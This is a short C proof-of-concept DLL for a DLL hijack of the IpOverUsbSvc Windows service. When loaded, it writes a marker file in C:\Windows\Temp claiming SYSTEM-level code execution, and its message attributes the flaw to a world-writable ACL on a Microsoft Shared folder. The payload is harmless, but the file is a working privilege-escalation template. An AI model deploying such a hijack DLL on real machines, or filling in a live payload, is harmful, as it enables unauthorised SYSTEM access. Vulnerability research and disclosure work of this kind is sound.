#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hDLL, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        HANDLE hFile = CreateFileA(
            "C:\\Windows\\Temp\\PWNED_SYSTEM.txt",
            GENERIC_WRITE,
            0,
            NULL,
            CREATE_ALWAYS,
            FILE_ATTRIBUTE_NORMAL,
            NULL
        );
        if (hFile != INVALID_HANDLE_VALUE) {
            char msg[] = "[+] IpOverUsbSvc DLL Hijack PoC\r\n"
                         "[+] Code execution as SYSTEM achieved!\r\n"
                         "[+] Vuln: Insecure ACL on C:\\Microsoft Shared\\\r\n"
                         "[+] BUILTIN\\Users have Full Control (F)\r\n";
            DWORD written;
            WriteFile(hFile, msg, sizeof(msg) - 1, &written, NULL);
            CloseHandle(hFile);
        }
    }
    return TRUE;
}